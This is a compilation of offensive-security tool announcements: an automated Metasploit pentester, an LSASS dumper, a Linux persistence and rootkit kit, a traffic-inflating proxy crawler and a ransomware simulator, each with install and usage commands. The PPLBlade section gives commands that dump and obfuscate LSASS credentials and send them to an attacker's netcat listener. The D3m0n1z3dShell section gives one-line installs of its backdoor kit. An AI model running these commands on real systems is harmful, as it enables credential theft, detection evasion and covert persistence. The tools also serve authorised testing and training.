
CATSploit - An Automated Penetration Testing Tool Using Cyber Attack Techniques Scoring

By: Zion3R


CATSploit is an automated penetration testing tool that uses the Cyber Attack Techniques Scoring (CATS) method and can be operated without a pentester. Until now, pentesters have implicitly selected the attack techniques suited to a target system based on professional experience. CATSploit instead uses system configuration information such as the OS, open ports, and software versions collected by a scanner, and calculates a capture score (eVc) and a detectability score (eVd) for each attack technique against the target system. By selecting the techniques with the best score values, it can choose the most appropriate attack technique for the target system without professional pentesting skill.

CATSploit automatically performs penetration tests in the following sequence:

  1. Information gathering and prior information input. First, CATSploit gathers information about the target systems. It supports nmap and OpenVAS for information gathering, and it also accepts prior information about the targets if you have any.

  2. Calculating score values of attack techniques. Using the information obtained in the previous phase and the attack techniques database, the capture (eVc) and detectability (eVd) evaluation values of each attack technique are calculated for every target computer.

  3. Selecting attack techniques and building attack scenarios. Attack techniques are selected and attack scenarios are created according to pre-defined policies. For example, under a policy that prioritizes being hard to detect, the attack techniques with the lowest eVd (detectability score) are selected. A sketch of this selection step follows the list.

  4. Executing the attack scenario. CATSploit executes the attack techniques according to the scenario constructed in the previous phase, using Metasploit as a framework and the Metasploit API to launch the actual attacks.
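The scoring-based selection in steps 2 and 3 can be illustrated with a small Python sketch. The data shapes here are hypothetical (not CATSploit's internals); the example scores are taken from the scenario table later in this post.

# Illustrative sketch of CATS-style scenario selection, not CATSploit code.
# Each candidate carries a capture score (eVc) and a detectability score (eVd).
scenarios = [
    {"id": "rmgrof", "eVc": 100.0, "eVd": 32.0},
    {"id": "joglhf", "eVc": 70.0,  "eVd": 60.0},
    {"id": "5gnsvh", "eVc": 1.0,   "eVd": 53.76},
]

def select(scenarios, policy="capture"):
    """Pick a scenario: maximize eVc, or minimize eVd for stealth."""
    if policy == "capture":     # prioritize likelihood of capture
        return max(scenarios, key=lambda s: s["eVc"])
    if policy == "stealth":     # prioritize hard-to-detect techniques
        return min(scenarios, key=lambda s: s["eVd"])
    raise ValueError(f"unknown policy: {policy}")

print(select(scenarios, "capture")["id"])   # rmgrof (eVc = 100.0)
print(select(scenarios, "stealth")["id"])   # rmgrof (eVd = 32.0)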


Prerequisites

CATSploit has the following prerequisites:

  • Kali Linux 2023.2a

Installation

Metasploit, Nmap and OpenVAS are assumed to be installed as part of the Kali distribution.

Installing CATSploit

To install the latest version of CATSploit, please use the following commands:

Cloning and setup
$ git clone https://github.com/catsploit/catsploit.git
$ cd catsploit
$ git clone https://github.com/catsploit/cats-helper.git
$ sudo ./setup.sh

Editing configuration file

CATSploit uses a server-client architecture, and the server reads a JSON configuration file at startup. In config.json, the following fields should be modified for your environment (a hypothetical sample follows the list).

  • DBMS
    • dbname: database name created for CATSploit
    • user: username of PostgreSQL
    • password: password of PostgrSQL
    • host: If you are using a database on a remote host, specify the IP address of the host
  • SCENARIO
    • generator.maxscenarios: Maximum number of scenarios to calculate (*)
  • ATTACKPF
    • msfpassword: password of MSFRPCD
    • openvas.user: username of PostgreSQL
    • openvas.password: password of PostgreSQL
    • openvas.maxhosts: Maximum number of hosts to be test at the same time (*)
    • openvas.maxchecks: Maximum number of test items to be test at the same time (*)
  • ATTACKDB
    • attack_db_dir: Path to the folder where AtackSteps are stored

(*) Adjust the number according to the specs of your machine.
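For reference, a config.json assembled from the fields above might look like the following. The nesting and the literal dotted key names are assumptions based on this list, and all values are placeholders:

{
  "DBMS": {
    "dbname": "catsploit",
    "user": "postgres",
    "password": "YOUR_DB_PASSWORD",
    "host": "localhost"
  },
  "SCENARIO": {
    "generator.maxscenarios": 1000
  },
  "ATTACKPF": {
    "msfpassword": "YOUR_MSFRPCD_PASSWORD",
    "openvas.user": "admin",
    "openvas.password": "YOUR_OPENVAS_PASSWORD",
    "openvas.maxhosts": 3,
    "openvas.maxchecks": 10
  },
  "ATTACKDB": {
    "attack_db_dir": "/path/to/AttackSteps"
  }
}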

Usage

To start the server, execute the following command:

$ python cats_server.py -c [CONFIG_FILE]

Next, prepare another console, start the client program, and initiate a connection to the server.

$ python catsploit.py -s [SOCKET_PATH]

After successfully connecting to the server and initializing it, the session will start.

   _________  ___________       __      _ __
  / ____/   |/_  __/ ___/____  / /___  (_) /_
 / /   / /| | / /  \__ \/ __ \/ / __ \/ / __/
/ /___/ ___ |/ /  ___/ / /_/ / / /_/ / / /_
\____/_/  |_/_/  /____/ .___/_/\____/_/\__/
                     /_/

[*] Connecting to cats-server
[*] Done.
[*] Initializing server
[*] Done.
catsploit>

The client can execute a variety of commands. Each command can be executed with -h option to display the format of its arguments.

usage: [-h] {host,scenario,scan,plan,attack,post,reset,help,exit} ...

positional arguments:
{host,scenario,scan,plan,attack,post,reset,help,exit}

options:
-h, --help show this help message and exit

I've posted the commands and options below as well for reference.

host list:
show information about the hosts
usage: host list [-h]
options:
-h, --help show this help message and exit

host detail:
show more information about one host
usage: host detail [-h] host_id
positional arguments:
host_id ID of the host for which you want to show information
options:
-h, --help show this help message and exit

scenario list:
show information about the scenarios
usage: scenario list [-h]
options:
-h, --help show this help message and exit

scenario detail:
show more information about one scenario
usage: scenario detail [-h] scenario_id
positional arguments:
scenario_id ID of the scenario for which you want to show information
options:
-h, --help show this help message and exit

scan:
run network-scan and security-scan
usage: scan [-h] [--port PORT] target_host [target_host ...]
positional arguments:
target_host IP address to be scanned
options:
-h, --help show this help message and exit
--port PORT ports to be scanned

plan:
planning attack scenarios
usage: plan [-h] src_host_id dst_host_id
positional arguments:
src_host_id originating host
dst_host_id target host
options:
-h, --help show this help message and exit

attack:
execute attack scenario
usage: attack [-h] scenario_id
positional arguments:
scenario_id ID of the scenario you want to execute

options:
-h, --help show this help message and exit

post find-secret:
search for confidential information files on the pwned host
usage: post find-secret [-h] host_id
positional arguments:
host_id ID of the host for which you want to find confidential information
options:
-h, --help show this help message and exit

reset:
reset data on the server
usage: reset [-h] {system} ...
positional arguments:
{system} reset system
options:
-h, --help show this help message and exit

exit:
exit CATSploit
usage: exit [-h]
options:
-h, --help show this help message and exit

Examples

In this example, we use CATSploit to scan the network, plan an attack scenario, and execute the attack.

catsploit> scan 192.168.0.0/24
Network Scanning ... 100%
[*] Total 2 hosts were discovered.
Vulnerability Scanning ... 100%
[*] Total 14 vulnerabilities were discovered.
catsploit> host list
┏━━━━━━━━━━┳━━━━━━━━━━━━━━━━┳━━━━━━━━━━┳━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┳━━━━━━━┓
┃ hostID ┃ IP ┃ Hostname ┃ Platform ┃ Pwned ┃
┑━━━━━━━━━━╇━━━━━━━━━━━━━━━━╇━━━━━━━━━━╇━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━╇━━━━━━━┩
β”‚ attacker β”‚ 0.0.0.0 β”‚ kali β”‚ kali 2022.4 β”‚ True β”‚
β”‚ h_exbiy6 β”‚ 192.168.0.10 β”‚ β”‚ Linux 3.10 - 4.11 β”‚ False β”‚
β”‚ h_nhqyfq β”‚ 192.168.0.20 β”‚ β”‚ Microsoft Windows 7 SP1 β”‚ False β”‚
└──────────┴ β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”΄β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”΄β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”΄β”€β”€β”€β”€β”€β”€β”€β”˜


catsploit> host detail h_exbiy6
┏━━━━━━━━━━┳━━━━━━━━━━━━━━┳━━━━━━━━━━┳━━━━━━━━━━━━━━┳━━━━━━━┓
┃ hostID ┃ IP ┃ Hostname ┃ Platform ┃ Pwned ┃
┑━━━━━━━━━━╇━━━━━━━━━━━━━━╇━━━━━━━━━━╇━━━━━━━━━━━━━━╇━━━━━━━┩
β”‚ h_exbiy6 β”‚ 192.168.0.10 β”‚ ubuntu β”‚ ubuntu 14.04 β”‚ False β”‚
└──────────┴──────────────┴──────────┴──────────────┴─ β”€β”€β”€β”€β”€β”˜

[IP address]
┏━━━━━━━━━━━━━━┳━━━━━━━━━━┳━━━━━━┳━━━━━━━━━━━━┓
┃ ipv4 ┃ ipv4mask ┃ ipv6 ┃ ipv6prefix ┃
┑━━━━━━━━━━━━━━╇━━━━━━━━━━╇━━━━━━╇━━━━━━━━━━━━┩
β”‚ 192.168.0.10 β”‚ β”‚ β”‚ β”‚
└──────────── β”€β”΄β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”΄β”€β”€β”€β”€β”€β”€β”΄β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜

[Open ports]
┏━━━━━━━━━━━━━━┳━━━━━━━┳━━━━━━┳━━━━━━━━━━━━━┳━━━━━━━━━━━━━━┳━━━━━━━━━━━━━━━━━━━━━━━━━━━━┓
┃ ip ┃ proto ┃ port ┃ service ┃ product ┃ version ┃
┑━━━━━━━━━━━━━━╇━━━━━━━╇━━━━━━╇━━━━━━━━━━━━━╇━━━━━━━━━━━━━━╇━━━━━━━━━━━━━━━━━━━━━━━━━━━━┩
β”‚ 192.168.0.10 β”‚ tcp β”‚ 21 β”‚ ftp β”‚ ProFTPD β”‚ 1.3.5 β”‚
β”‚ 192.168.0.10 β”‚ tcp β”‚ 22 β”‚ ssh β”‚ OpenSSH β”‚ 6.6.1p1 Ubuntu 2ubuntu2.10 β”‚
β”‚ 192.168.0.10 β”‚ tcp β”‚ 80 β”‚ http β”‚ Apache httpd β”‚ 2.4.7 β”‚
β”‚ 192.168.0.10 β”‚ tcp β”‚ 445 β”‚ netbios-ssn β”‚ Samba smbd β”‚ 3.X - 4.X β”‚
β”‚ 192.168.0.10 β”‚ tcp β”‚ 631 β”‚ ipp β”‚ CUPS β”‚ 1.7 β”‚
β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”΄β”€β”€β”€β”€β”€β”€β”€β”΄β”€β”€β”€β”€β”€β”€β”΄β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”΄β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”΄β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜

[Vulnerabilities]
┏━━━━━━━━━━━━━━┳━━━━━━━┳━━━━━━┳━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┳━━━━━━━━━━━━━━━━┓
┃ ip ┃ proto ┃ port ┃ vuln_name ┃ cve ┃
┑━━━━━━━━━━━━━━╇━━━━━━━╇━━━━━━╇━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━╇━━━━━━━━━━━━━━━━┩
β”‚ 192.168.0.10 β”‚ tcp β”‚ 0 β”‚ TCP Timestamps Information Disclosure β”‚ N/A β”‚
β”‚ 192.168.0.10 β”‚ tcp β”‚ 21 β”‚ FTP Unencrypted Cleartext Login β”‚ N/A β”‚
β”‚ 192.168.0.10 β”‚ tcp β”‚ 22 β”‚ Weak MAC Algorithm(s) Supported (SSH) β”‚ N/A β”‚
β”‚ 192.168.0.10 β”‚ tcp β”‚ 22 β”‚ Weak Encryption Algorithm(s) Supported (SSH) β”‚ N/A β”‚
β”‚ 192.168.0.10 β”‚ tcp β”‚ 22 β”‚ Weak Host Key Algorithm(s) (SSH) β”‚ N/A β”‚
β”‚ 192.168.0.10 β”‚ tcp β”‚ 22 β”‚ Weak Key Exchange (KEX) Algorithm(s) Supported (SSH) β”‚ N/A β”‚
β”‚ 192.168.0.10 β”‚ tcp β”‚ 80 β”‚ Test HTTP dangerous methods β”‚ N/A β”‚
β”‚ 192.168.0.10 β”‚ tcp β”‚ 80 β”‚ Drupal Core SQLi Vulnerability (SA-CORE-2014-005) - Active Check β”‚ CVE-2014-3704 β”‚
β”‚ 192.168.0.10 β”‚ tcp β”‚ 80 β”‚ Drupal Coder RCE Vulnerability (SA-CONTRIB-2016-039) - Active Check β”‚ N/A β”‚
β”‚ 192.168.0.10 β”‚ tcp β”‚ 80 β”‚ Sensitive File Disclosure (HTTP) β”‚ N/A β”‚
β”‚ 192.168.0.10 β”‚ tcp β”‚ 80 β”‚ Unprotected Web App / Device Installers (HTTP) β”‚ N/A β”‚
β”‚ 192.168.0.10 β”‚ tcp β”‚ 80 β”‚ Cleartext Transmission of Sensitive Information via HTTP β”‚ N/A β”‚
β”‚ 192.168.0.10 β”‚ tcp β”‚ 80 β”‚ jQuery < 1.9.0 XSS Vulnerability β”‚ CVE-2012-6708 β”‚
β”‚ 192.168.0.10 β”‚ tcp β”‚ 80 β”‚ jQuery < 1.6.3 XSS Vulnerability β”‚ CVE-2011-4969 β”‚
β”‚ 192.168.0.10 β”‚ tcp β”‚ 80 β”‚ Drupal 7.0 Information Disclosure Vulnerability - Active Check β”‚ CVE-2011-3730 β”‚
β”‚ 192.168.0.10 β”‚ tcp β”‚ 631 β”‚ SSL/TLS: Report Vulnerable Cipher Suites for HTTPS β”‚ CVE-2016-2183 β”‚
β”‚ 192.168.0.10 β”‚ tcp β”‚ 631 β”‚ SSL/TLS: Report Vulnerable Cipher Suites for HTTPS β”‚ CVE-2016-6329 β”‚
β”‚ 192.168.0.10 β”‚ tcp β”‚ 631 β”‚ SSL/TLS: Report Vulnerable Cipher Suites for HTTPS β”‚ CVE-2020-12872 β”‚
β”‚ 192.168.0.10 β”‚ tcp β”‚ 631 β”‚ SSL/TLS: Deprecated TLSv1.0 and TLSv1.1 Protocol Detection β”‚ CVE-2011-3389 β”‚
β”‚ 192.168.0.10 β”‚ tcp β”‚ 631 β”‚ SSL/TLS: Deprecated TLSv1.0 and TLSv1.1 Protocol Detection β”‚ CVE-2015-0204 β”‚
└──────────────┴───────┴──────┴─────────────────────────────────────────────────────────────────────┴───& #9472;β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜

[Users]
┏━━━━━━━━━━━┳━━━━━━━┓
┃ user name ┃ group ┃
┑━━━━━━━━━━━╇━━━━━━━┩
β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”΄β”€β”€β”€β”€β”€β”€β”€β”˜


catsploit> plan attacker h_exbiy6
Planning attack scenario...100%
[*] Done. 15 scenarios was planned.
[*] To check each scenario, try 'scenario list' and/or 'scenario detail'.
catsploit> scenario list
┏━━━━━━━━━━━━━┳━━━━━━━━━━━━━┳━━━━━━━━━━━━━━━━┳━━━━━━━┳━━━━━━━┳━━━━━━━┳━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┓
┃ scenario id ┃ src host ip ┃ target host ip ┃ eVc ┃ eVd ┃ steps ┃ first attack step ┃
┑━━━━━━━━━━━━━╇━━━━━━━━━━━━━╇━━━━━━━━━━━━━━━━╇━━━━━━━╇━━━━━━━╇━━━━━━━╇━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┩
β”‚ 3d3ivc β”‚ 0.0.0.0 β”‚ 192.168.0.10 β”‚ 1.0 β”‚ 32.0 β”‚ 1 β”‚ exploit/multi/http/jenkins_s… β”‚
β”‚ 5gnsvh β”‚ 0.0.0.0 β”‚ 192.168.0.10 β”‚ 1.0 β”‚ 53.76 β”‚ 2 β”‚ exploit/multi/http/jenkins_s… β”‚
β”‚ 6nlxyc β”‚ 0.0.0.0 β”‚ 192.168.0.10 β”‚ 0.0 β”‚ 48.32 β”‚ 2 β”‚ exploit/multi/http/jenkins_s… β”‚
β”‚ 8jos4z β”‚ 0.0.0.0 β”‚ 192.168.0.10 β”‚ 0.7 β”‚ 72.8 β”‚ 2 β”‚ exploit/multi/http/jenkins_s… β”‚
β”‚ 8kmmts β”‚ 0.0.0.0 β”‚ 192.168.0.10 β”‚ 0.0 β”‚ 32.0 β”‚ 1 β”‚ exploit/multi/elasticsearch/… β”‚
β”‚ agjmma β”‚ 0.0.0.0 β”‚ 192.168.0.10 β”‚ 0.0 β”‚ 24.0 β”‚ 1 β”‚ exploit/windows/http/managee… β”‚
β”‚ joglhf β”‚ 0.0.0.0 β”‚ 192.168.0.10 β”‚ 70.0 β”‚ 60.0 β”‚ 1 β”‚ auxiliary/scanner/ssh/ssh_lo… β”‚
β”‚ rmgrof β”‚ 0.0.0.0 β”‚ 192.168.0.10 β”‚ 100.0 β”‚ 32.0 β”‚ 1 β”‚ exploit/multi/http/drupal_dr… β”‚
β”‚ xuowzk β”‚ 0.0.0.0 β”‚ 192.168.0.10 β”‚ 0.0 β”‚ 24.0 β”‚ 1 β”‚ exploit/multi/http/struts_dm… β”‚
β”‚ yttv51 β”‚ 0.0.0.0 β”‚ 192.168.0.10 β”‚ 0.01 β”‚ 53.76 β”‚ 2 β”‚ exploit/multi/http/jenkins_s… β”‚
β”‚ znv76x β”‚ 0.0.0.0 β”‚ 192.168.0.10 β”‚ 0.01 β”‚ 53.76 β”‚ 2 β”‚ exploit/multi/http/jenkins_s… β”‚
β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”΄β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”΄β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”΄β”€β”€β”€β”€β”€β”€β”€β”΄β”€β”€β”€β”€β”€β”€β”€β”΄β”€β”€β”€β”€β”€β”€β”€β”΄β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜

catsploit> scenario detail rmgrof
┏━━━━━━━━━━━━━┳━━━━━━━━━━━━━━━━┳━━━━━━━┳━━━━━━┓
┃ src host ip ┃ target host ip ┃ eVc ┃ eVd ┃
┑━━━━━━━━━━━━━╇━━━━━━━━━━━━━━━━╇━━━━━━━╇━━━━━━┩
β”‚ 0.0.0.0 β”‚ 192.168.0.10 β”‚ 100.0 β”‚ 32.0 β”‚
└─────────────┴──────── β”€β”€β”€β”€β”€β”€β”€β”΄β”€β”€β”€β”€β”€β”€β”€β”΄β”€β”€β”€β”€β”€β”€β”˜

[Steps]
┏━━━┳━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┳━━━━━━━━━━━━━━━━━━━━━━━┓
┃ # ┃ step ┃ params ┃
┑━━━╇━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━╇━━━━━━━━━━━━━━━━━━━━━━━┩
β”‚ 1 β”‚ exploit/multi/http/drupal_drupageddon β”‚ RHOSTS: 192.168.0.10 β”‚
β”‚ β”‚ β”‚ LHOST: 192.168.10.100 β”‚
β””β”€β”€β”€β”΄β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”΄β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜


catsploit> attack rmgrof
> ~
> Metasploit Console Log
> ~
> ~
[+] Attack scenario succeeded!


catsploit> exit
Bye.

Disclaimer

All information and code is provided solely for educational purposes and/or for testing your own systems.

Contact

For any inquiry, please contact us at the following email address:

catsploit@nk.MitsubishiElectric.co.jp



PPLBlade - Protected Process Dumper Tool

By: Zion3R


Protected Process Dumper Tool that supports obfuscating memory dumps and transferring them to remote workstations without dropping them onto the disk.

Key functionalities:

  1. Bypassing PPL protection
  2. Obfuscating memory dump files to evade Defender signature-based detection mechanisms
  3. Uploading memory dump with RAW and SMB upload methods without dropping it onto the disk (fileless dump)

An overview of the techniques used in this tool can be found here: https://tastypepperoni.medium.com/bypassing-defenders-lsass-dump-detection-and-ppl-protection-in-go-7dd85d9a32e6

Note that PROCEXP15.SYS is listed in the source files for compiling purposes. It does not need to be transferred to the target machine alongside PPLBlade.exe.

It’s already embedded into PPLBlade.exe; the exploit is just a single executable.

Modes:

  1. Dump - Dump process memory using PID or Process Name
  2. Decrypt - Revert an obfuscated (--obfuscate) dump file to its original state
  3. Cleanup - Perform cleanup manually in case something goes wrong during execution (the option values should be the same as those of the execution you are cleaning up after)
  4. DoThatLsassThing - Dump lsass.exe using the Process Explorer driver (basic PoC)

Handle Modes:

  1. Direct - Opens PROCESS_ALL_ACCESS handle directly, using OpenProcess() function
  2. Procexp - Uses PROCEXP152.sys to obtain a handle

Examples:

Basic POC that uses PROCEXP152.sys to dump lsass:

PPLBlade.exe --mode dothatlsassthing

(Note that this mode does not XOR the dump file; provide the additional --obfuscate flag to enable the XOR functionality.)

Upload the obfuscated LSASS dump onto a remote location:

PPLBlade.exe --mode dump --name lsass.exe --handle procexp --obfuscate --dumpmode network --network raw --ip 192.168.1.17 --port 1234

Attacker host:

nc -lnp 1234 > lsass.dmp
python3 deobfuscate.py --dumpname lsass.dmp

Deobfuscate memory dump:

PPLBlade.exe --mode decrypt --dumpname PPLBlade.dmp --key PPLBlade
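The XOR obfuscation described above amounts to a repeating-key XOR over the dump bytes. Here is a minimal Python sketch under that assumption; the bundled deobfuscate.py remains the authoritative implementation:

from itertools import cycle

def xor_deobfuscate(path_in: str, path_out: str, key: bytes) -> None:
    """Undo a repeating-key XOR (XOR is its own inverse)."""
    with open(path_in, "rb") as f:
        blob = f.read()
    plain = bytes(b ^ k for b, k in zip(blob, cycle(key)))
    with open(path_out, "wb") as f:
        f.write(plain)

xor_deobfuscate("lsass.dmp", "lsass_clean.dmp", b"PPLBlade")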


Valid8Proxy - Tool Designed For Fetching, Validating, And Storing Working Proxies

By: Zion3R


Valid8Proxy is a versatile and user-friendly tool designed for fetching, validating, and storing working proxies. Whether you need proxies for web scraping, data anonymization, or testing network security, Valid8Proxy simplifies the process by providing a seamless way to obtain reliable and verified proxies.


Features:

  1. Proxy Fetching: Retrieve proxies from popular proxy sources with a single command.
  2. Proxy Validation: Efficiently validate proxies using multithreading to save time.
  3. Save to File: Save the list of validated proxies to a file for future use.

Usage:

  1. Clone the Repository:

    git clone https://github.com/spyboy-productions/Valid8Proxy.git
  2. Navigate to the Directory:

    cd Valid8Proxy
  3. Install Dependencies:

    pip install -r requirements.txt
  4. Run the Tool:

    python Valid8Proxy.py
  5. Follow Interactive Prompts:

    • Enter the number of proxies you want to print.
    • Sit back and let Valid8Proxy fetch, validate, and display working proxies.
  6. Save to File:

    • At the end of the process, Valid8Proxy will save the list of working proxies to a file named "proxies.txt" in the same directory.
  7. Check Results:

    • Review the working proxies in the terminal with color-coded output.
    • Find the list of working proxies saved in "proxies.txt."

If you already have proxies and just want to validate them, use this:

python Validator.py

Follow the prompts:

Enter the path to the file containing proxies (e.g., proxy_list.txt), then enter the number of proxies you want to validate. The script will validate the specified number of proxies using multiple threads and print the valid ones; a rough sketch of that loop follows.
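This is not Validator.py's actual code, just a minimal illustration of multithreaded validation; the httpbin.org/ip test endpoint is an assumption, and any echo service would do:

from concurrent.futures import ThreadPoolExecutor
import requests

TEST_URL = "https://httpbin.org/ip"  # hypothetical liveness-check endpoint

def is_alive(proxy: str) -> bool:
    """Return True if an HTTP GET through the proxy succeeds."""
    proxies = {"http": f"http://{proxy}", "https": f"http://{proxy}"}
    try:
        return requests.get(TEST_URL, proxies=proxies, timeout=5).ok
    except requests.RequestException:
        return False

with open("proxy_list.txt") as f:
    candidates = [line.strip() for line in f if line.strip()]

with ThreadPoolExecutor(max_workers=32) as pool:
    results = pool.map(is_alive, candidates)

working = [p for p, ok in zip(candidates, results) if ok]
print("\n".join(working))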

Contribution:

Contributions and feature requests are welcome! If you encounter any issues or have ideas for improvement, feel free to open an issue or submit a pull request.


If you find this GitHub repo useful, please consider giving it a star!



Wireshark Analyzer 4.2.2

Wireshark is a GTK+-based network protocol analyzer that lets you capture and interactively browse the contents of network frames. The goal of the project is to create a commercial-quality analyzer for Unix and Win32 and to give Wireshark features that are missing from closed-source sniffers. This is the source code release.

D3m0n1z3dShell - Demonized Shell Is An Advanced Tool For Persistence In Linux

By: Zion3R


Demonized Shell is an advanced tool for persistence in Linux.


Install

git clone https://github.com/MatheuZSecurity/D3m0n1z3dShell.git
cd D3m0n1z3dShell
chmod +x demonizedshell.sh
sudo ./demonizedshell.sh

One-Liner Install

Download D3m0n1z3dShell with all files:

curl -L https://github.com/MatheuZSecurity/D3m0n1z3dShell/archive/main.tar.gz | tar xz && cd D3m0n1z3dShell-main && sudo ./demonizedshell.sh

Load D3m0n1z3dShell statically (without the static-binaries directory):

sudo curl -s https://raw.githubusercontent.com/MatheuZSecurity/D3m0n1z3dShell/main/static/demonizedshell_static.sh -o /tmp/demonizedshell_static.sh && sudo bash /tmp/demonizedshell_static.sh

Demonized Features

  • Auto Generate SSH keypair for all users
  • APT Persistence
  • Crontab Persistence
  • Systemd User level
  • Systemd Root Level
  • Bashrc Persistence
  • Privileged user & SUID bash
  • LKM Rootkit Modified, Bypassing rkhunter & chkrootkit
  • LKM Rootkit With file encoder. persistent icmp backdoor and others features.
  • ICMP Backdoor
  • LD_PRELOAD Setup PrivEsc
  • Static Binaries For Process Monitoring, Dump credentials, Enumeration, Trolling and Others Binaries.

Pending Features

  • LD_PRELOAD Rootkit
  • Process Injection
  • install for example: curl github.com/test/test/demonized.sh | bash
  • Static D3m0n1z3dShell
  • Intercept Syscall Write from a file
  • ELF/Rootkit Anti-Reversing Technique
  • PAM Backdoor
  • rc.local Persistence
  • init.d Persistence
  • motd Persistence
  • Persistence via php webshell and aspx webshell

And other types of features that will come in the future.

Contribution

If you want to contribute and help with the tool, please contact me on Twitter: @MatheuzSecurity

Note

We are not responsible for any damage caused by this tool, use the tool intelligently and for educational purposes only.



SQLMAP - Automatic SQL Injection Tool 1.8

sqlmap is an open source command-line automatic SQL injection tool. Its goal is to detect and take advantage of SQL injection vulnerabilities in web applications. Once it detects one or more SQL injections on the target host, the user can choose among a variety of options to perform an extensive back-end database management system fingerprint, retrieve DBMS session user and database, enumerate users, password hashes, privileges, databases, dump entire or user's specified DBMS tables/columns, run his own SQL statement, read or write either text or binary files on the file system, execute arbitrary commands on the operating system, establish an out-of-band stateful connection between the attacker box and the database server via Metasploit payload stager, database stored procedure buffer overflow exploitation or SMB relay attack and more.

PhantomCrawler - Boost Website Hits By Generating Requests From Multiple Proxy IPs

By: Zion3R


PhantomCrawler allows users to simulate website interactions through different proxy IP addresses. It leverages Python, requests, and BeautifulSoup to offer a simple and effective way to test website behaviour under varied proxy configurations.

Features:

  • Utilizes a list of proxy IP addresses from a specified file.
  • Supports both HTTP and HTTPS proxies.
  • Allows users to input the target website URL, proxy file path, and a static port.
  • Makes HTTP requests to the specified website using each proxy.
  • Parses HTML content to extract and visit links on the webpage.

Usage:

  • POC Testing: Simulate website interactions to assess functionality under different proxy setups.
  • Web Traffic Increase: Boost website hits by generating requests from multiple proxy IPs.
  • Proxy Rotation Testing: Evaluate the effectiveness of rotating proxy IPs.
  • Web Scraping Testing: Assess web scraping tasks under different proxy configurations.
  • DDoS Awareness: Caution: The tool has the potential for misuse as a DDoS tool. Ensure responsible and ethical use.

Get new proxies (with ports) and add them to proxies.txt in the format 50.168.163.176:80.
  • You can get them from https://free-proxy-list.net/ ; these free proxies are not validated and some might not work, so validate them before adding.

How to Use:

  1. Clone the repository:
git clone https://github.com/spyboy-productions/PhantomCrawler.git
  2. Install dependencies:
pip3 install -r requirements.txt
  3. Run the script:
python3 PhantomCrawler.py

Disclaimer: PhantomCrawler is intended for educational and testing purposes only. Users are cautioned against any misuse, including potential DDoS activities. Always ensure compliance with the terms of service of websites being tested and adhere to ethical standards.



If you find this GitHub repo useful, please consider giving it a star!



Proxmark3 4.17768 Custom Firmware

This is a custom firmware written for the Proxmark3 device. It extends the currently available firmware. This release is nicknamed Steamboat Willie.

Faraday 5.0.1

Faraday is a tool that introduces a new concept called IPE, or Integrated Penetration-Test Environment. It is a multiuser penetration test IDE designed for distribution, indexation and analysis of the generated data during the process of a security audit. The main purpose of Faraday is to re-use the available tools in the community to take advantage of them in a multiuser way.

RansomwareSim - A Simulated Ransomware

By: Zion3R

Overview

RansomwareSim is a simulated ransomware application developed for educational and training purposes. It is designed to demonstrate how ransomware encrypts files on a system and communicates with a command-and-control server. This tool is strictly for educational use and should not be used for malicious purposes.

Features

  • Encrypts specified file types within a target directory.
  • Changes the desktop wallpaper (Windows only).
  • Creates&Delete a README file on the desktop with a simulated ransom note.
  • Simulates communication with a command-and-control server to send system data and receive a decryption key.
  • Decrypts files after receiving the correct key.

Usage

Important: This tool should only be used in controlled environments where all participants have given consent. Do not use this tool on any system without explicit permission. For more, read SECURE

Requirements

  • Python 3.x
  • cryptography
  • colorama

Installation

  1. Clone the repository:

    git clone https://github.com/HalilDeniz/RansomwareSim.git
  2. Navigate to the project directory:

    cd RansomwareSim
  3. Install the required dependencies:

    pip install -r requirements.txt


Running the Control Server

  1. Open controlpanel.py.
  2. Start the server by running controlpanel.py.
  3. The server will listen for connections from RansomwareSim and the Decoder.

Running the Simulator

  1. Navigate to the directory containing RansomwareSim.
  2. Modify the main function in encoder.py to specify the target directory and other parameters.
  3. Run encoder.py to start the encryption process.
  4. Follow the instructions displayed on the console.

Running the Decoder

  1. Run decoder.py after the files have been encrypted.
  2. Follow the prompts to input the decryption key.

Disclaimer

RansomwareSim is developed for educational purposes only. The creators of RansomwareSim are not responsible for any misuse of this tool. This tool should not be used in any unauthorized or illegal manner. Always ensure ethical and legal use of this tool.

Contributing

Contributions, suggestions, and feedback are welcome. Please create an issue or pull request for any contributions.

